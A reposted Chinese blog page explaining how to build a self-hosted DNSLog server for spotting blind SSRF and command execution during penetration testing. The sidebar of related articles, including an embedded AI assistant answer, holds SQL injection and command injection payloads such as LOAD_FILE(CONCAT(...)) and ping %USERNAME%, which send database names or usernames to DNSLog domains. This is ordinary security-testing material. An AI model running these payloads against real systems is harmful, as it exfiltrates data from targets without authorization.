dnslog搭建

最新推荐文章于 2025-04-04 22:38:08 发布
最新推荐文章于 2025-04-04 22:38:08 发布
阅读量3k 收藏 1
点赞数
文章标签: python 运维
原文链接:http://www.cnblogs.com/yangxiaodi/p/8449086.html
版权

为什么想重写这个呢,想说后面扫描ssrf和命令执行的时候,能快速改成自己想要的api,更容易修改一些。

工具改自:https://github.com/bugScanTeam/DNSLog

 

需要两个域名和一台服务器。

推荐这里买一个.pw域名,可以自定义dns服务器。https://cn.resellerclub.com/

 
 
 
 
 
 
上面两张图是在resellerclub买的域名xxxx.pw,然后指向第二个域名:ns1.ddd.com,ns2.ddd.com
 
 
 
 
 
下面这个步骤需要在两个地方设置
 
 
第一步:
 
 
买第二个域名ddd.com,这时候的子域名服务器指向
 
 
ns1.ddd.com   服务器IP
 
 
ns2.ddd.com 服务器IP
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
然后域名服务器指向dnspod.net
 
 
 
 
 
 
 
 
 
 
 第二步
 
 
来到https://www.dnspod.cn/console/
 
 
添加第一步买的ddd.com域名,添加两条A记录,对应ns1和ns2,记录值指向服务器IP
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 这样就差不多了。 
 
 
服务器建议ubuntu 16.04的,建议在vultr上买,按小时计费。https://www.vultr.com/?ref=7063369
 
 
 
 
 
在服务器上执行:
 
 
sudo apt-get update
sudo apt-get install python3-pip
 
 
export LC_ALL=C
pip3 install dnslib
pip3 install coloredlogs
pip3 install flask
 
 
apt-get install tmux
 
 
然后修改dns_web_log.py里面的值
 
 

DNS_DOMAIN = 'xxxx.pw' # 做dns记录的域名
NS1_DOMAIN = 'ns1.ddd.com' # NS域名
NS2_DOMAIN = 'ns2.ddd.com'
SERVER_IP = 'xx.xx.xx.xx'# 服务器IP
 
 
 
 
 
然后直接运行 nohup /usr/bin/python3 dns_web_log.py runserver --threaded &
 
 
源码地址:https://github.com/yangxiaodi/dns_web_logs
 
 
访问http://45.77.246.128/admin/show_web
 
 
 
 
 
 
 
 
 
 
访问: http://45.77.246.128/admin/show_dns
 
 
 
 
 
 

 

转载于:https://www.cnblogs.com/yangxiaodi/p/8449086.html

                

        




    

  



    

      

        

            

              
                
                  aixuan9365
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
dnslog注入_dnslog盲注

				
			

			

				

					计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
				

				

					09-09
					
					1995
					
				

			

		

		

			
				
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog

			
		

	



                

            
              



	

		

			

				
					
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口

				
			

			

				

					03-08
				

			

		

		

			
				
简介
DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口
安装
详细图文教程:  : 
 1.获取发行版这里下载最新发行版,并解压
2.域名与公网IP准备
搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS 服务器域名(例:a.com),一个用于记录域名(例: b.com)。还需要有一个公网 IP 地址(如:1.1.1.1)
注意:b.com 的域名提供商需要支持自定义 NS 记录, a.com 则无要求。
在 a.com 中设置两条 A 记录:
ns1.a.com  A 记录指向  1.1.1.1        
ns2.a.com  A 记录指向  1.1.1.1
修改 b.com 的 NS 记录为 1 中设定的两个域名
本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找

			
		

	



              


  
              

                


	

		

			

				
					
自建DNSlog服务器

				
			

			

				

					一枚小白的分享,不喜勿喷~
				

				

					07-14
					
					2567
					
				

			

		

		

			
				
在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来。网上公开提供dnslog服务有很多,比如dnslog.cn、知道创宇、三叶草等等,但是这些提供的域名是固定的,现在一些比较大型的企业已经把这些域名也加入到监控范围之中了。如果自建一个dnslog服务,就能很好的规避这种情况。

			
		

	





	

		

			

				
					
DNSLog漏洞探测

					
最新发布

				
			

			

				

					weixin_64359465的博客
				

				

					04-04
					
					456
					
				

			

		

		

			
				
例如:ping %USERNAME%.xxx.dnslog.cn。secure_file_priv参数。MySQL load_file函数。Windows下DNSLog利用。CVE漏洞中DNSLog的使用。Linux下DNSLog利用。Windows环境变量大全。二、常用DNSLog平台。注意使用HTTP协议访问。账号信息profile。ceye.io使用方法。三、Web漏洞实战案例。一、DNSLog介绍。DNSLog注入步骤。

			
		

	



		

			
		



	

		

			

				
					
快速搭建自用dnslog

				
			

			

				

					寒星的博客
				

				

					04-21
					
					4912
					
				

			

		

		

			
				
快速搭建自用dnslog
前言
dnslog是常见的辅助验证漏洞的手段,为什么要自建dnslog?

第三方dnslog在一些特殊时期会受到一股神秘力量影响变得不稳定甚至不能用
有些业务或者信息不方便使用第三方平台
常见的dnslog平台会被安全产品检测到

网上已经有很多开源的dnslog平台,且有不少的dnslog搭建教程,但是看下来感觉还是有点麻烦,而且不容易集成到自己平台。对于个人来说,很多步骤其实是可以省略的。前几天原来的dnslog的域名到期了,又重新买了个新的重新搭建了一次。正好分享一下我是如

			
		

	





	

		

			

				
					
Web安全和渗透测试有什么关系?

				
			

			

				

					Python_0011的博客
				

				

					03-31
					
					2511
					
				

			

		

		

			
				
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。

			
		

	





	

		

			

				
					
dnslog服务器搭建指导

				
			

			

				

					鹿鸣天涯
				

				

					09-11
					
					633
					
				

			

		

		

			
				
申请云服务器时, 自带一个公网ip, 但是这个公网ip没有绑定在本地的网卡中, 安装interactsh会有问题, dnslog无法正常使用, 需要额外再绑定一个公网ip, 才可以保证dnslog正常使用。一个云服务器绑定了新的公网ip, 则原来的公网ip就没有办法使用了, 还会导致主机连接不上的风险, 摸索过程中, 暂时没有一个很成熟的方案。有一台自己的云服务器(注意: 建议申请海外的云服务器, 笔者在搭建的过程中发现使用国内的服务器, 搭建网站需要备案,流程比较复杂)将域名和步骤3的公网ip绑定。

			
		

	





	

		

			

				
					
占坑规划——dnslog原理分析&私有搭建

				
			

			

				

					viki1998的博客
				

				

					06-11
					
					264
					
				

			

		

		

			
				
盲猜通过访问目标网站的web记录,把request中带的参数在日志中进行检测,10秒一轮 抓到返回ip  时间 正好web日志中间件都可以记录 这些内容 占个坑后续补充。起因:测试某只有发送记录的功能 想到xss平台然后想到dnslog私有化。开始前猜测如何实现 单从dnslog的实现来看。

			
		

	





	

		

			

				
					
DNSlog环境搭建

				
			

			

				

					守护万家灯火
				

				

					05-29
					
					547
					
				

			

		

		

			
				
NS记录就是*.域名指向记录值ns1.域名 如:*.aaa.com ns1.aaa.com。A记录就是ns1.域名指向记录值VPS地址 如: ns1.aaa.com 1.1.1.1。浏览器访问http://vps地址:8000/template/DNS服务器填写ns1和ns2 如:ns1.aaa.com。IP地址填写你的VPS地址 如:1.1.1.1。购买阿里云域名后设置“自定义DNSHOST”填写解析记录,一个A记录、一个NS记录。阿里云域名+公网VPS地址。就可以admin使用了。

			
		

	





	

		

			

				
					
安全技术|DNSLOG平台搭建从0到1

				
			

			

				

					Jeeseen123的博客
				

				

					06-24
					
					1734
					
				

			

		

		

			
				
安全技术|DNSLOG平台搭建从0到1
DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。
前期准备
一个域名,一台vps
本文使用的是:阿里云购买的域名和云服务器ECS
域名:example.icu
vps ip:100.100.100.100
实验过程
1.添加DNS解析
在云解析D

			
		

	





	

		

			

				
					
dnslog server

				
			

			

				

					09-08
				

			

		

		

			
				
DNSlog Server是一个专门用于DNS日志记录和分析的工具,主要应用于网络安全领域,特别是渗透测试和应急响应。在本文中,我们将深入探讨DNSlog Server的工作原理、用途以及如何利用它来提升网络安全。  **DNSlog ...

			
		

	





	

		

			

				
					
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版

				
			

			

				

					04-02
				

			

		

		

			
				
DNSLog-平台-Golang
相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键!
部署
克隆或者下载本仓库到你的服务器上
不多说。
决定是否开放公网访问?
倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil)
域名准备
做好NS指向即可。不会检查请看后文
尝试运行
~~

			
		

	





	

		

			

				
					
个人DNSLog平台搭建

				
			

			

				

					ShangYaoPaiGu的博客
				

				

					12-07
					
					2716
					
				

			

		

		

			
				
搭建一个DNSLog平台需要准备以下:我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件。在服务器中输入

解压



进入目录后使用保证DNSLog平台可以在后台运行



创建新的,使用该命令后会自动进入该screen:



修改配置文件

			
		

	





	

		

			

				
					
【渗透测试工具分享】【dnslog服务器搭建指导】

				
			

			

				

					一个程序员
				

				

					07-16
					
					6218
					
				

			

		

		

			
				
dnslog服务器

			
		

	





	

		

			

				
					
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗

				
			

			

				

					2401_84973011的博客
				

				

					05-12
					
					1390
					
				

			

		

		

			
				
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。

			
		

	





	

		

			

				
					
dnslog 记录

				
			

			

				

					K0reyoshi的博客
				

				

					04-18
					
					1347
					
				

			

		

		

			
				
http://127.0.0.1/inject.php?user=1'+and+if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='lol' limit 0,1),'.d63d7k.ceye.io\\ab'))),1,1)--+-
http:...

			
		

	





	

		

			

				
					
阿里云域名搭建DNSLOG

				
			

			

				

					qq_36226141的博客
				

				

					07-19
					
					2910
					
				

			

		

		

			
				
阿里云域名搭建DNSLOG

			
		

	





	

		

			

				
					
如何低成本搭建dnslog服务器

				
			

			

				

					weixin_34315485的博客
				

				

					05-25
					
					2417
					
				

			

		

		

			
				
DNSLog,简单来说,就是通过记录对于域名的DNS请求,通过dns请求这个相对“隐蔽”的渠道,来委婉地获取到想要获得的信息。
例如,在一个针对mysql数据库的注入中,如果没有回显,可能很多时候就要歇菜。
但如果对方的数据库服务器连接公网并且是Windows机器的话,就可以用这种姿势来获取信息:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FR...

			
		

	





	

		

			

				
					
dnslog怎么用

				
			

			

				

					03-12
				

			

		

		

			
				
<think>好的,用户现在问的是“DNSLog怎么用”。之前他们问了关于Yakit反连域名的问题,现在可能是想更深入了解DNSLog的使用方法,尤其是在Yakit中的应用。我需要先回顾之前的回答,确保这次的内容连贯,不重复但补充更多细节。

首先,用户可能是安全测试人员或开发者,正在使用Yakit进行渗透测试或者漏洞检测。他们之前遇到域名配置的问题,现在想了解如何正确使用DNSLog功能。需要明确DNSLog的基本概念,它在安全测试中的作用,比如检测盲注漏洞、SSRF等。

接下来,我需要分步骤讲解DNSLog的使用方法,确保结构清晰。可能包括配置DNSLog服务、生成Payload、触发记录、查看结果等步骤。同时要结合Yakit的具体操作,比如如何在Yakit中启动DNSLog,配置域名,生成子域名等。

还需要注意用户可能的疑问点,比如DNSLog的原理,为什么能检测到请求,以及使用时的注意事项,比如网络可达性、域名解析延迟等。此外,用户可能对实际应用场景感兴趣,可以举几个例子,比如SQL盲注、SSRF漏洞检测,这样他们能更好地理解如何应用DNSLog。

另外,要确保语言简洁,避免技术术语过于复杂,必要时举例说明。比如在生成Payload时,给出具体例子,用户可以直接参考使用。同时,提醒用户常见问题,如域名解析不成功可能的原因和解决方法,这部分可以参考之前的回答,但简要带过,避免重复。

最后,总结使用步骤和注意事项,帮助用户快速掌握。可能还需要对比其他工具或方法,突出DNSLog的优势,比如无侵入性、易于检测异步漏洞等。确保回答覆盖用户的需求,同时引导他们正确有效地使用DNSLog功能。</think>以下是 **DNSLog 的基本用法详解**,结合渗透测试与漏洞验证场景:

---

### **1. DNSLog 是什么?**
DNSLog 是一种**无侵入式检测技术**,常用于发现 **盲注漏洞**(如 SQL 盲注、命令注入)或 **SSRF** 等隐蔽漏洞。其核心原理:  
- 通过让目标访问一个**唯一子域名**(如 `xxxx.dnslog.cn`),触发 DNS 查询请求。  
- 攻击者监控 DNS 服务器日志,若收到查询记录,则证明漏洞存在。

---

### **2. 使用场景**
| 场景               | 案例                                                         |
|--------------------|--------------------------------------------------------------|
| SQL 盲注检测       | 构造 `SELECT LOAD_FILE('\\\\your-dnslog.ceye.io\\test')`     |
| 命令注入检测       | 执行 `ping %USERNAME%.dnslog.cn`,验证是否解析成功           |
| SSRF 漏洞验证      | 让服务器请求 `http://internal-server:8080@your-dnslog.cn`    |
| 无回显漏洞利用     | 盲打漏洞时替代传统反弹 Shell,绕过防火墙限制                 |

---

### **3. 使用步骤(以 Yakit 为例)**

#### **Step 1: 启动 DNSLog 服务**
1. 打开 Yakit,进入 **`反连管理`** → **`DNSLog`**。  
2. 点击 **`启动服务`**,确保监听端口(默认 53)未被占用。  
   - **若本地环境受限**:建议使用公网服务器部署 Yakit,并配置域名解析(参考前文域名配置方法)。

---

#### **Step 2: 生成 DNSLog Payload**
1.DNSLog 界面点击 **`生成域名`**,得到一个唯一子域名(如 `abc123.yak-domain.com`)。  
2. 将子域名嵌入到攻击载荷中:  
   - **SQL 盲注**:  
     ```sql
     ' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT DATABASE()),'.abc123.yak-domain.com\\'))) --+
     ```
   - **命令注入**:  
     ```bash
     ping %OS%.abc123.yak-domain.com
     ```

---

#### **Step 3: 触发 DNS 查询**
1. 将构造的 Payload 发送给目标系统(如提交表单、发送 HTTP 请求)。  
2. 若漏洞存在,目标会尝试解析 `abc123.yak-domain.com`,触发 DNS 查询。

---

#### **Step 4: 查看 DNSLog 结果**
- 返回 Yakit 的 DNSLog 界面,若成功捕获请求,会显示:  
  ```plaintext
  [2023-08-20 14:00:00] 收到 DNS 查询:database_name.abc123.yak-domain.com
  ```
- **关键信息提取**:子域名前缀可能携带漏洞返回的数据(如 `database_name`)。

---

### **4. 注意事项**
1. **域名解析延迟**:  
   - DNS 查询可能有 1-5 分钟延迟,受本地缓存和 TTL 影响。  
2. **网络可达性**:  
   - 确保目标服务器能访问你的 DNSLog 服务器(检查防火墙、路由规则)。  
3. **动态公网 IP**:  
   - 若使用本地环境,需通过端口映射(如 `ngrok`、`frp`)将 DNS 服务暴露到公网。  
4. **避免滥用**:  
   - 公共 DNSLog 平台(如 `ceye.io`)有请求频率限制,建议自建服务。  

---

### **5. 自建 DNSLog 服务(进阶)**
若需更高可控性,可手动搭建:  
1. **安装工具**:  
   ```bash
   git clone https://github.com/BugScanTeam/DNSLog && cd DNSLog
   docker-compose up -d
   ```
2. **配置域名**:  
   - 将域名 NS 记录指向自建服务器 IP。  
3. **使用方式**:与 Yakit 内置服务类似,生成子域名并监控日志。

---

### **附:常见问题**
- **Q:DNSLog 没收到请求?**  
  - 检查目标是否出网、防火墙是否拦截 53 端口 UDP 协议。  
- **Q:如何区分不同漏洞来源?**  
  - 为每个测试用例生成唯一子域名(如 `ssrf123.yak-domain.com`)。  
- **Q:DNSLog 能否获取 HTTP 内容?**  
  - 不能,仅记录 DNS 查询。如需获取 HTTP 请求,需配合 **HTTPLog**(Yakit 中可同时启用)。

---

通过以上步骤,可快速利用 DNSLog 检测无回显漏洞,提升渗透测试效率。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值